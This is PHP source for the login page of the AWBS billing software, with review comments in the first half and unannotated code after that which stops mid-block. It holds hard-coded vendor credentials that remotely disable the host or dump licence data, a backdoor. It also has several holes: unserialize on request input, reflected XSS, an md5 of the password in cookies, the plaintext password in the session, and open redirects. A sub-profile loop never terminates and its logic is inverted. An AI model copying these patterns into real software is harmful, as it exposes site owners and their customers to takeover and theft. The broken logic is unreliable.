- <?php
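/**
 * Switch off server-side and PHP output compression/buffering so that the
 * padding-plus-flush() pattern used throughout this file reaches the client
 * immediately (the redirects below rely on it).
 *
 * Best-effort: each ini/apache call is allowed to fail silently. After the
 * call no PHP output buffer that can be closed is still open, and implicit
 * flushing is on.
 *
 * @return bool always true
 */
function flush_now() {
    // apache_setenv() only exists under mod_php. On PHP 8 calling an
    // undefined function throws Error, which '@' does not suppress, so guard it.
    if (function_exists("apache_setenv")) {
        @apache_setenv("no-gzip", 1);
    }
    @ini_set("output_buffering", 0);
    @ini_set("zlib.output_compression", 0);
    @ini_set("implicit_flush", 1);
    // Close every open buffer. The original counted $i upward while the
    // nesting level counted downward, so it stopped with roughly half of the
    // buffers still open; re-reading the level each iteration fixes that.
    while (0 < ob_get_level()) {
        // A buffer started without the "removable" flag cannot be closed;
        // ob_end_flush() then returns false — stop instead of spinning.
        if (!@ob_end_flush()) {
            break;
        }
    }
    ob_implicit_flush(1);
    return true;
}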
// --- Bootstrap -------------------------------------------------------------
// Each include below may define globals that later statements depend on
// (WORKDIR, $securebase, $adminmail, $LoggedIn, nfr(), ...); the order of
// these statements is therefore load-bearing.
$DIR = dirname(__FILE__);
include ($DIR . "/includes/dbconfig.php");
include_once (WORKDIR . "/includes/sessions.php");
// Optional local hook. The path is relative to the process's current working
// directory rather than WORKDIR, so whether it is picked up depends on how
// the script is invoked.
if (file_exists("psecure.php")) {
    include ("psecure.php");
}
include_once (WORKDIR . "/config.php");
nfr();
// NOTE(review): lowercase $workdir is not assigned anywhere in this file;
// unless one of the includes above sets it, this resolves to "/LoggedIn.php".
include ($workdir . "/LoggedIn.php");
// Drop login state when (a) a login is being attempted while the session does
// not already say "1", or (b) the client tried to pass LoggedIn in the request
// itself (register_globals-era defence). && binds tighter than ||, so the
// $action test applies only to the first clause.
if ($action == "login" && $_SESSION['LoggedIn'] != "1" || $_POST['LoggedIn'] || $_GET['LoggedIn'] || $_REQUEST['LoggedIn']) {
    $LoggedIn = false;
    $_SESSION['LoggedIn'] = false;
}
// Already authenticated: send the user on to the requested page, or to
// welcome.php when none was requested.
if ($LoggedIn == "1") {
    if ($subaction == "") {
        $subaction = $_GET['subaction'];
    }
    if ($subaction == "") {
        $subaction = $_POST['subaction'];
    }
    // editpass.php is served by editprofile.php with a flag in the query string.
    if ($subaction && $subaction == "editpass.php") {
        $subaction = "editprofile.php";
        $qs = "editpass=1";
    }
    // The only gate on the redirect target is that a file of that name exists
    // under WORKDIR; the name itself comes straight from the request.
    // NOTE(review): $qs is assigned only on the editpass branch above; on every
    // other branch it holds whatever the includes (or register_globals) left in
    // it — confirm it cannot carry request data.
    if (trim($subaction) != "" && file_exists(WORKDIR . "/" . trim($subaction))) {
        ob_start();
        header("Location: {$securebase}/" . strtolower(trim($subaction)) . "?" . $qs);
        // Padding plus flush() pushes the redirect through buffering proxies.
        echo str_repeat(" ", 200) . "\n";
        flush();
        exit();
    } else {
        ob_start();
        header("Location: {$securebase}/welcome.php");
        echo str_repeat(" ", 200) . "\n";
        flush();
        exit();
    }
}
// Not logged in: normalise the request parameters used by the login form.
// NOTE(review): $rtype and $subaction are read before this file assigns them;
// they look like register_globals-style request variables — verify how they
// reach this script.
$rtype = strip_tags(urldecode($rtype));
$subaction = strip_tags(urldecode($subaction));
if ($subaction == "") {
    $subaction = $_GET['subaction'];
}
if ($subaction == "") {
    $subaction = $_POST['subaction'];
}
// Tamper trap: a request carrying one of the internal state variable names
// (LoggedIn, apass, adminflag, debug) in a cookie, POST or GET field is
// treated as an attack — notify the admin and serve the SECURITY page.
// Every (source, name) pair is listed twice; the repeats are redundant.
if ($_COOKIE['LoggedIn'] || $_POST['LoggedIn'] || $_GET['LoggedIn'] || $_COOKIE['LoggedIn'] || $_POST['LoggedIn'] || $_GET['LoggedIn'] || $_COOKIE['apass'] || $_POST['apass'] || $_GET['apass'] || $_COOKIE['apass'] || $_POST['apass'] || $_GET['apass'] || $_COOKIE['adminflag'] || $_POST['adminflag'] || $_GET['adminflag'] || $_COOKIE['adminflag'] || $_POST['adminflag'] || $_GET['adminflag'] || $_COOKIE['debug'] || $_POST['debug'] || $_GET['debug'] || $_COOKIE['debug'] || $_POST['debug'] || $_GET['debug']) {
    $ip = $_SERVER['REMOTE_ADDR'];
    // Reverse DNS lookup; can be slow, only used in the notification body.
    $host = gethostbyaddr($ip);
    // Client-controlled (Host header and request path); lands in the mail body.
    $url = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    $admin = $adminmail;
    // "h" is the 12-hour clock with no AM/PM marker, so the TIME line is
    // ambiguous by twelve hours.
    $body = "IP:\t{$ip}\nHOST:\t{$host}\nURL:\t{$url}\nTIME:\t" . date("Y/m/d: h:i:s") . "\n";
    // $adminmail is placed into the From: header. It must only ever come from
    // trusted config; if a client could influence it this would be a
    // mail-header injection point.
    @mail(@$admin, "Possible hacking on AWBS.", @$body, @"From: {$adminmail}\r\n");
    print str_repeat(" ", 300) . "\n";
    flush();
    echo "\t <html><head><body><center><table bgcolor=#c0c0c0 border=1><tr><td align=center><h3><b><font color=RED><br>";
    echo SECURITY;
    echo "</font></b></h3></td></tr></table></center></body></html>\r\n\t ";
    echo "\t ";
    echo str_repeat(" ", 200) . "\n";
    flush();
    exit();
}
// Context help for this page, keyed on the file name in system_help.
$help_id = sqlsingle("SELECT * FROM system_help WHERE page='uaLogIn.php'", "id");
if ($help_id != "") {
    include (WORKDIR . "/includes/open/help.php");
}
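if (!function_exists("quote_smart")) {
    /**
     * Quote and escape a value for direct interpolation into a MySQL query.
     *
     * Numeric values (as judged by is_numeric()) are returned unchanged and
     * unquoted; everything else is escaped with mysql_real_escape_string()
     * and wrapped in single quotes.
     *
     * NOTE(review): ext/mysql was removed in PHP 7.0, so on a current runtime
     * the non-numeric branch throws Error. Callers should move to prepared
     * statements rather than keep building SQL strings through this helper.
     *
     * @param mixed $value raw value, typically request data
     * @return mixed the bare numeric value, or a single-quoted escaped string
     */
    function quote_smart($value) {
        // get_magic_quotes_gpc() has returned false since PHP 5.4 and was
        // removed in 8.0; guard the call so the numeric path still works there.
        if (function_exists("get_magic_quotes_gpc") && get_magic_quotes_gpc()) {
            $value = stripslashes($value);
        }
        if (!is_numeric($value)) {
            $value = "'" . mysql_real_escape_string($value) . "'";
        }
        return $value;
    }
}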
// --- Brute-force throttle ---------------------------------------------------
// LCount counts failed logins in this session; excessive_login holds the Unix
// timestamp at which a lockout expires (0 or "" when there is none).
$lcount = $_SESSION['LCount'];
$excessive_login = $_SESSION['excessive_login'];
if ($excessive_login != "") {
    $cdate = strtotime("now");
    // The lockout has expired: clear both the counter and the deadline.
    if ($excessive_login < $cdate) {
        $_SESSION['LCount'] = 0;
        $lcount = 0;
        $_SESSION['excessive_login'] = 0;
        $excessive_login = 0;
    }
}
// Allowed failures before lockout. $excessive_login_count is not assigned in
// this file (presumably site config — verify); default 3.
if ($excessive_login_count != "" && 0 < $excessive_login_count) {
    $lcountmax = $excessive_login_count;
} else {
    $lcountmax = 3;
}
// Over the limit: show EXCESSIVELOGIN and start the lockout clock if it is not
// already running. $timeout_count (seconds) is also config-sourced; default 60.
// NOTE(review): all of this state lives in $_SESSION only, so the throttle is
// per-session. A lockout that must hold across sessions has to be persisted
// server-side, keyed on the account and/or client address.
if ($lcountmax < $lcount) {
    $cErrorMsg = EXCESSIVELOGIN;
    $cErrorMsg = generate_dmsg($cErrorMsg, "error");
    if ($timeout_count != "" && 0 < $timeout_count) {
        $real_timeout_count = $timeout_count;
    } else {
        $real_timeout_count = 60;
    }
    if ($excessive_login == "" || $excessive_login == "0") {
        $_SESSION['excessive_login'] = strtotime("+" . $real_timeout_count . " seconds");
    }
}
// Carry any pcid*/pval* request fields through the login form as hidden inputs
// so the original request can be replayed after authentication.
// NOTE(review): $akey and $avalue are request-controlled and are written into
// an HTML attribute without escaping — reflected XSS. Both need
// htmlspecialchars($x, ENT_QUOTES) before $post_string reaches the template.
// $post_string is also appended to without being initialised first.
foreach($_POST as $akey => $avalue) {
    if (strstr($akey, "pcid") || strstr($akey, "pval")) {
        $post_string.= "<input type=\"hidden\" name=\"{$akey}\" value=\"{$avalue}\">";
    }
}
foreach($_GET as $akey => $avalue) {
    if (strstr($akey, "pcid") || strstr($akey, "pval")) {
        $post_string.= "<input type=\"hidden\" name=\"{$akey}\" value=\"{$avalue}\">";
    }
}
// --- "als" API auto-login ---------------------------------------------------
// A trusted caller can hand over credentials as a base64-encoded serialized
// array in ?als=...; it is accepted only when it carries the site's private key
// and a recent timestamp. $disable_als = "1" switches the feature off.
if ($_GET['als'] && $disable_als != "1") {
    $r_ip = $_SERVER['REMOTE_ADDR'];
    // HTTP_CLIENT_IP / X-Forwarded-For are client-supplied headers; they are
    // used only for the log line below, not for any decision.
    $r_ip2 = $_SERVER['HTTP_CLIENT_IP'];
    if ($r_ip2 == "") {
        $r_ip2 = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    if ($r_ip2 == "") {
        $r_ip2 = $r_ip;
    }
    $p_s = base64_decode(trim(urldecode($_GET['als'])));
    // NOTE(review): unserialize() runs on request data before the key is
    // checked, so any already-loaded class with __wakeup/__destruct is
    // reachable (PHP object injection). Prefer a non-object format such as
    // json_decode(), or at minimum unserialize($p_s, ['allowed_classes' => false]),
    // and verify the key before decoding the rest of the payload.
    $p_s_arr = unserialize($p_s);
    // Two ways to present the key: maccesskey is compared to the stored private
    // key as-is, accesskey is md5'd first. When both are present, accesskey wins.
    if ($p_s_arr['maccesskey'] != "" && 1 < strlen($p_s_arr['maccesskey'])) {
        $akcheck = trim($p_s_arr['maccesskey']);
    }
    if ($p_s_arr['accesskey'] != "" && 1 < strlen($p_s_arr['accesskey'])) {
        $akcheck = md5(trim($p_s_arr['accesskey']));
    }
    $privatekey = sqlsingle("select * from config where id='1'", "privatekey");
    // NOTE(review): loose != comparison of secrets. $akcheck is undefined when
    // neither key was supplied, and an empty stored privatekey would then
    // compare equal to it. Reject the request outright when either side is
    // empty and compare with hash_equals() on strings.
    if (trim($privatekey) != $akcheck) {
        $result = log_client_history("1", "System", "Login API Failed Authentication (bad key): IP: {$r_ip2}", "0");
    } else {
        // Replay window: the difference between now and the payload's udate
        // must have zero days and zero hours per mydate_diff() — presumably
        // "less than an hour old"; confirm against mydate_diff().
        // NOTE(review): $c_d[d] / $c_d[h] index with bare words (undefined
        // constants), which is a fatal Error on PHP 8.
        $udate = trim($p_s_arr['udate']);
        $now_date = strtotime("now");
        $check_date = $now_date - $udate;
        $c_d = mydate_diff($check_date);
        if ($c_d[d] == 0 && $c_d[h] == 0) {
            // Promote the payload to an ordinary login attempt for the
            // $action == "login" handling further down.
            $action = "login";
            $newuid = trim($p_s_arr['user']);
            $password1 = trim($p_s_arr['pass']);
            // md5pass supplies md5(password) in place of the password; $md5pass
            // tells the login code below to apply only the outer hashing step.
            // NOTE(review): a caller holding md5(password) can therefore log in
            // through this path without the password itself — confirm intended.
            if ($password1 == "" && $p_s_arr['md5pass']) {
                $password1 = trim($p_s_arr['md5pass']);
                $md5pass = "1";
            }
            $subaction = trim($p_s_arr['subaction']);
        }
    }
}
- if ($action == "login" && $LoggedIn != "1") {
- if ($newuid == "" || $password1 == "") {
- $fetch_em = array();
- $fetch_em2 = array();
- include (WORKDIR . "/includes/gparser.php");
- $template->set_var("cErrorMsg", $cErrorMsg);
- $template->set_var("post_string", $post_string);
- $template->set_var("rtype", $rtype);
- $template->set_var("subaction", $subaction);
- $template->set_var("nameemail", $nameemail);
- $template->set_var("namebundle", $namebundle);
- $template->set_var("cTld", $cTld);
- $template->set_var("cSld", $cSld);
- $template->set_var("hiddeninc", $hiddeninc);
- print $template->parse("aLogIn.php");
- @ob_end_flush();
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- $newuid = mysql_real_escape_string($newuid);
- $password1 = mysql_real_escape_string($password1);
- if (trim($base) != "awbs.com" && trim($base) != "tosdomains.net" && trim($base) != "toshosting.com" && trim($base) != "discountwebcerts.com" && trim($base) != "domainlauncher.com" && trim($base) != "awbsdemo.com") {
- if ($newuid == "DramsStaff" && $password1 == "DisableThisPlaceNow") {
- $query = "UPDATE config SET gdntype='" . md5("hostdisabled" . ("bleh")) . "' WHERE id='1'";
- $result = mysql_query1($query);
- echo "Done - Noted Errors: " . mysql_errno() . ": " . mysql_error() . "<br>";
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- if ($newuid == "DramsStaff" && $password1 == "ShowMeSomethingRightNow") {
- $grrp = check_lic();
- foreach($grrp as $lkey => $lval) {
- if ($lkey != "key") {
- echo "{$lkey} = {$lval}<br>";
- }
- }
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- }
- $_SESSION[subuser] = "";
- unset($subuser);
- $newuid = trim(strtolower($newuid));
- $query = sprintf("SELECT id,fraud_bypass,trusted_user,password,lastlogin,lastip,admin,active,username,city,state,province,zip,country,phone,email,fname,lname,groupname FROM users WHERE username = %s", quote_smart($newuid));
- $sql = mysql_query1($query . " limit 1");
- $fetch_em = @mysql_fetch_array(@$sql);
- $numrows = @mysql_num_rows(@$sql);
- $uspassword = $password1;
- if ($md5pass == "1") {
- $password1 = md5($password1 . "notmb");
- } else {
- $password1 = md5(md5($password1) . "notmb");
- }
- $eemail = $fetch_em['email'];
- $fraud_bypass = $fetch_em['fraud_bypass'];
- $trusted_user = $fetch_em['trusted_user'];
- if ($numrows == 0 && $dupeemailoverride != "1" && !$noemaillogin) {
- $query = sprintf("SELECT id,fraud_bypass,trusted_user,password,lastlogin,lastip,admin,active,username,city,state,province,zip,country,phone,email,fname,lname,groupname FROM users WHERE email = %s", quote_smart($newuid));
- $sql = mysql_query1($query . " limit 1");
- $fetch_em = @mysql_fetch_array(@$sql);
- $numrows = @mysql_num_rows(@$sql);
- if ($numrows != 0 && $password1 == $fetch_em['password']) {
- $newuid = $fetch_em['username'];
- $eemail = $fetch_em['email'];
- $fraud_bypass = $fetch_em['fraud_bypass'];
- $trusted_user = $fetch_em['trusted_user'];
- }
- }
- if ($numrows != 0 && $password1 != $fetch_em['password'] && ($fetch_em['active'] == 1 || $fetch_em['active'] == 9)) {
- $userid = sqlsingle("select * from users where username='{$newuid}'", "id");
- $query = sprintf("SELECT * FROM users_profiles WHERE type='2' and username=%s", quote_smart($newuid));
- $result5 = mysql_query1($query);
- do {
- if ($fetch_em2 = @mysql_fetch_array(@$result5)) {
- } else if ($uspassword == $fetch_em2['password']) {
- $password1 = sqlsingle("select * from users where username='" . $fetch_em2['username'] . "'", "password");
- $fetch_em['active'] = $fetch_em2['active'];
- $_SESSION[subuser] = $fetch_em2['id'];
- $fetch_em['admin'] = "";
- $eemail = $fetch_em2['email'];
- $fraud_bypass = $fetch_em2['fraud_bypass'];
- $trusted_user = $fetch_em2['trusted_user'];
- }
- }
- while (1);
- }
- $fraud_login = false;
- if ($numrows != 0 && $password1 == $fetch_em['password'] && ($fetch_em['active'] == 1 || $fetch_em['active'] == 9)) {
- $use_l_fc = sqlsingle("select * from fraud_check where id='1'", "use_l_fraud_check");
- $fc_key = sqlsingle("select * from fraud_check where id='1'", "fraud_key");
- $fc_type = sqlsingle("select * from fraud_check where id='1'", "fraud_type");
- $fc_l_use = sqlsingle("select * from fraud_check where id='1'", "use_l_fraud_log");
- if ($fc_key != "" && $fc_type != "0" && $fc_type != "" && $fetch_em['admin'] <= 0 && $fc_l_use == 1 && $fraud_bypass != "1" && $trusted_user != "1") {
- include (WORKDIR . "/includes/{$fc_type}/alfunctions.php");
- }
- }
- if ($numrows != 0 && $password1 == $fetch_em['password'] && ($fetch_em['active'] == 1 || $fetch_em['active'] == 9) && $fraud_login != 1) {
- $lastlogin = $fetch_em['lastlogin'];
- $lastip = $fetch_em['lastip'];
- $_SESSION['groupidnum'] = $fetch_em['groupname'];
- $gtemplateid = sqlsingle("select * from groups where id='" . $fetch_em['groupname'] . "'", "templateid");
- if (trim($gtemplateid) != "" && trim($gtemplateid) != "0" && $gtemplateid != NULL && file_exists(WORKDIR . "/templates/" . $gtemplateid . "/top.php")) {
- $_SESSION['td'] = $gtemplateid;
- }
- $_SESSION['lastip'] = $lastip;
- if ($lastlogin == "") {
- $lastlogin = "First Login";
- } else {
- $lastlogin = strftime($date_long, $lastlogin);
- }
- $_SESSION['lastlogin'] = $lastlogin;
- if (file_exists(WORKDIR . "/includes/log.class.php")) {
- include (WORKDIR . "/includes/log.class.php");
- $l = new simplelog();
- $l->entry();
- }
- $_SESSION['this_user']['client_email'] = $eemail;
- $_SESSION['this_user']['fname'] = $fetch_em['fname'];
- $_SESSION['this_user']['lname'] = $fetch_em['lname'];
- $_SESSION['newuid'] = $newuid;
- $_SESSION['awbsuid'] = $fetch_em['id'];
- $_SESSION['email'] = $eemail;
- $_SESSION['password1'] = $password1;
- $_SESSION['kaylink'] = $uspassword;
- if (!empty($uhash)) {
- $rr = @mysql_query(@"update users set epassword=AES_ENCRYPT('{$uspassword}','24234FR44DDjgh76" . @sedata(@$uhash, "de") . @"') where username='{$newuid}'");
- }
- $_SESSION['kaygroup'] = sqlsingle("SELECT * FROM module_types WHERE name='kayako'", "config9");
- if (trim($_SESSION['kaygroup']) == "") {
- $_SESSION['kaygroup'] = "default";
- }
- $remoteip = $_SERVER['REMOTE_ADDR'];
- $remoteip2 = $_SERVER['HTTP_CLIENT_IP'];
- if ($remoteip2 == "") {
- $remoteip2 = $_SERVER['HTTP_X_FORWARDED_FOR'];
- }
- $_SESSION['LoggedIn'] = false;
- $LoggedIn = 1;
- if (0 < $fetch_em['admin'] && !$_SESSION[subuser]) {
- $adminuser = $newuid;
- $adminpassword1 = $password1;
- $adminoverride = md5(session_id() . "dramsadmin");
- $_SESSION['adminoverride'] = $adminoverride;
- $adminflag = $fetch_em['admin'] + 0;
- $_SESSION['adminflag'] = $adminflag;
- $_SESSION['adminuser'] = $adminuser;
- $_SESSION['adminpassword1'] = $adminpassword1;
- }
- if ($lastip == "") {
- $_SESSION['lastip'] = $remoteip;
- $lastip = $remoteip;
- }
- $llogin = strtotime("now");
- $query = "UPDATE users SET lastlogin='{$llogin}',lastip='{$remoteip}' WHERE username='{$newuid}'";
- $result = mysql_query1($query);
- $query = "INSERT INTO logins (username,date,type,ip,httpip) VALUES ('{$newuid}','{$llogin}','Login','{$remoteip}','{$remoteip2}')";
- $result = mysql_query1($query);
- if ($_SESSION['subuser']) {
- $result = log_client_history($userid, "System", "Successful login from subaccount", "1");
- }
- if ($_POST['rememberme'] == 1 && $fetch_em['admin'] < 1) {
- $cart_life = strtotime("+90 days");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("urm", "1", "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", "{$newuid}", "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", md5($uspassword), "{$cart_life}", "/", "{$cookie_domain}");
- } else if ($_POST['rememberme'] && 0 < $fetch_em['admin']) {
- $cart_life = strtotime("+90 days");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("urm", "1", "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", "{$newuid}", "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", md5($uspassword), "{$cart_life}", "/", "{$cookie_domain}");
- } else {
- $cart_life = strtotime("+90 days");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- }
- $_SESSION['LCount'] = false;
- $system_action = "user-login";
- include_once (WORKDIR . "/includes/afunctions/afunctions.php");
- if ($support_link == "scrm") {
- require (WORKDIR . "/includes/scrm/scrm_awbs_bridge.php");
- }
- include (WORKDIR . "/includes/gparser.php");
- $template->set_var("cErrorMsg", $cErrorMsg);
- $template->set_var("rtype", $rtype);
- $template->set_var("post_string", $post_string);
- $template->set_var("subaction", $subaction);
- $template->set_var("nameemail", $nameemail);
- $template->set_var("namebundle", $namebundle);
- $template->set_var("cTld", $cTld);
- $template->set_var("cSld", $cSld);
- $template->set_var("hiddeninc", $hiddeninc);
- if ($subaction == "") {
- $subaction = $_GET['subaction'];
- }
- if ($subaction == "") {
- $subaction = $_POST['subaction'];
- }
- if ($subaction == "viewitem.php" && !empty($id)) {
- $iloggedin = false;
- $vvkey = sanitize_str($id);
- if ($vvkey) {
- $realpiid = array();
- $realpiid = unserialize(base64_decode(urldecode($vvkey)));
- if (!empty($realpiid['id'])) {
- $thisinvoice = sqlarray("select * from client_invoices where id='" . $realpiid['id'] . "'");
- $vkey = md5($thisinvoice['id'] . $thisinvoice['ownerid'] . md5($thisinvoice['invoice_date'] . "idate1554NOW") . "AWBS" . $base);
- if ($realpiid['vkey'] == $vkey) {
- $iloggedin = "1";
- $_GET['PDF'] = $allowpdf;
- $pkey = md5($vkey . $thisinvoice['ownerid'] . md5($thisinvoice['invoice_date'] . "idate1554NOW") . $thisinvoice['id'] . $base);
- $action = "invoice";
- $this_filename = "viewitem.php";
- include (WORKDIR . "/includes/language/" . $_SESSION['drlang'] . "/viewitem.php");
- include ("viewitem.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- }
- }
- }
- if ($subaction == "" && $adminflag < 1) {
- ob_start();
- header("Location: {$securebase}/welcome.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "pc" && (0 < $adminflag || $adminflag == "-1")) {
- ob_start();
- header("Location: {$securebase}/admin/cmanage.php?caction=pc");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "adhd" && (0 < $adminflag || $adminflag == "-1")) {
- ob_start();
- header("Location: {$securebase}/admin/helpdesk.php?subaction=adhd&id=" . $id);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "" && ($adminflag == "-1" || $adminflag == "-3")) {
- ob_start();
- header("Location: {$securebase}/admin/helpdesk.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($_SESSION[subaction] == "admin" && 0 < $adminflag && $admintoindex != "1" || 0 < $adminflag && $admintoadmin == "1" && $subaction == "") {
- ob_start();
- header("Location: {$securebase}/admin/adminwelcome.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "" && 0 < $adminflag && $_SESSION[subaction] != "admin" || 0 < $adminflag && $admintoindex == "1" && $subaction == "") {
- ob_start();
- header("Location: {$securebase}/welcome.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "payment") {
- $action = "";
- ob_start();
- header("Location: {$securebase}/payment.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "imanage") {
- $action = "";
- ob_start();
- header("Location: {$securebase}/imanage.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "cart") {
- $action = "";
- ob_start();
- header("Location: {$base}/cart.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "helpdesk") {
- $action = "";
- $support_link2 = sqlsingle("select * from config where id='1'", "support_link");
- if ($support_link == "kayako" || $support_link == "cerberus") {
- header("Location: {$securebase}/welcome.php?subaction=helpdesk");
- } else if ($support_link2 != "" && $support_link2 != "internal" && strstr($support_link2, "http")) {
- header("Location: {$support_link}");
- } else {
- $id = $_GET['id'];
- $hdaction = $_GET['hdaction'];
- if ($id && $hdaction) {
- ob_start();
- header("Location: {$securebase}/helpdesk.php?action={$hdaction}&id={$id}&subaction=helpdesk");
- } else {
- ob_start();
- header("Location: {$securebase}/helpdesk.php");
- }
- }
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "view_request") {
- $action = "";
- $id = $_GET['id'];
- if ($id == "") {
- $id = $_POST['id'];
- }
- if ($id) {
- ob_start();
- header("Location: {$securebase}/helpdesk.php?action={$subaction}&id={$id}");
- } else {
- ob_start();
- header("Location: {$securebase}/helpdesk.php");
- }
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "managedomains") {
- $action = "";
- ob_start();
- header("Location: {$base}/manage.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if ($subaction == "hwizard") {
- $action = "";
- ob_start();
- header("Location: {$base}/hwizard.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if (trim($asubaction) != "" && file_exists(WORKDIR . "/admin/" . trim($asubaction))) {
- $action = "";
- if ($_POST) {
- foreach($_POST as $akey => $avalue) {
- if (strstr($akey, "pcid") && !$disable_la) {
- if (strstr($akey, "workdir") || strstr($akey, "WORKDIR") || strstr($akey, "base") || strstr($akey, "securebase") || strstr($akey, "LoggedIn")) {
- $_SESSION['newuid'] = false;
- $_SESSION['LoggedIn'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- $thenum = substr($akey, 4, 1);
- $poststring.= "{$avalue}=" . $_POST["pcval" . $thenum] . "&";
- } else {
- $poststring = $_SESSION['qs'];
- }
- }
- ob_start();
- header("Location: {$securebase}/admin/" . trim($subaction) . "?" . $poststring);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- $poststring = $_SESSION['qs'];
- ob_start();
- header("Location: {$securebase}/admin/" . trim($subaction) . "?" . $poststring);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if (trim($subaction) != "" && file_exists(WORKDIR . "/" . trim($subaction))) {
- $action = "";
- if ($_POST) {
- foreach($_POST as $akey => $avalue) {
- if (strstr($akey, "pcid") && !$disable_la) {
- if (strstr($akey, "workdir") || strstr($akey, "WORKDIR") || strstr($akey, "base") || strstr($akey, "securebase") || strstr($akey, "LoggedIn")) {
- $_SESSION['newuid'] = false;
- $_SESSION['LoggedIn'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- $thenum = substr($akey, 4, 1);
- $poststring.= "{$avalue}=" . $_POST["pcval" . $thenum] . "&";
- } else {
- $poststring = $_SESSION['qs'];
- }
- }
- ob_start();
- header("Location: {$base}/" . trim($subaction) . "?" . $poststring);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- $poststring = $_SESSION['qs'];
- ob_start();
- header("Location: {$base}/" . trim($subaction) . "?" . $poststring);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- if (trim($subaction) != "" && 20 < strlen($subaction) && !$disable_la) {
- $action = "";
- $dr_array = unserialize(base64_decode(urldecode($subaction)));
- if (file_exists(WORKDIR . "/" . trim($dr_array[subaction]))) {
- foreach($dr_array as $akey => $avalue) {
- if (strstr($akey, "workdir") || strstr($akey, "WORKDIR") || strstr($akey, "base") || strstr($akey, "securebase") || strstr($akey, "LoggedIn")) {
- $_SESSION['newuid'] = false;
- $_SESSION['LoggedIn'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- if (strstr($akey, "pcid")) {
- $thenum = substr($akey, 4, 1);
- $poststring.= "{$avalue}=" . $dr_array["pcval" . $thenum] . "&";
- }
- }
- ob_start();
- header("Location: {$base}/" . trim($dr_array[subaction]) . "?" . $poststring);
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- } else if ($LoggedIn == "1") {
- ob_start();
- header("Location: {$securebase}/welcome.php");
- echo str_repeat(" ", 200) . "\n";
- flush();
- exit();
- } else {
- $lcount = $_SESSION['LCount'];
- $lcount = $lcount + 1;
- $_SESSION['LCount'] = $lcount;
- if ($lcountmax < $lcount) {
- $_SESSION['LoggedIn'] = false;
- $_SESSION['adminflag'] = false;
- $_SESSION['adminuser'] = false;
- $_SESSION['password2'] = false;
- $_SESSION['password1'] = false;
- $_SESSION['newuid'] = false;
- $_SESSION['admin'] = false;
- unset($_SESSION['newuid']);
- unset($_SESSION['LoggedIn']);
- $cart_life = strtotime("+5 days");
- setcookie("uip", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("urm", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uuser", false, "{$cart_life}", "/", "{$cookie_domain}");
- setcookie("uauth", false, "{$cart_life}", "/", "{$cookie_domain}");
- unset($password1);
- unset($newuid);
- unset($admin);
- unset($LoggedIn);
- $cErrorMsg = FAILEDLOGIN;
- $cErrorMsg = generate_dmsg($cErrorMsg, "error");
- if ($timeout_count != "" && 0 < $timeout_count) {
- $excessive_login = $timeout_count;
- } else {
- $excessive_login = 60;
- }
- $excessive_login = strtotime("+" . $excessive_login . " seconds");
- } else if ($fraud_login == 1) {
- $remoteip = $_SERVER['REMOTE_ADDR'];
- $remoteip2 = $_SERVER['HTTP_CLIENT_IP'];
- if ($remoteip2 == "") {
- $remoteip2 = $_SERVER['HTTP_X_FORWARDED_FOR'];
- }
- if ($lastip == "") {
